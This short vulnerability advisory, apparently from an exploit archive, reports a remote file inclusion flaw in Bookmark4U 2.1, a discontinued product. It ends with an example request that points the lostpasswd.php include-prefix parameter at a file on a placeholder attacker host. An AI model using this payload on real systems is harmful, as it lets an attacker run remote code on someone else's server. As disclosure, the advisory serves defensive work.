Bookmark4U version 2.1 suffers from a remote file inclusion vulnerability.
1c83f5fff4e93b60fa957b4dc702ef29e076400da97c143bec1bfa063956986d
vendor - http://bookmark4u.sourceforge.net/
version - 2.1
solution - product discontinued
example -
http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://[attacker]/path/to/file.txt???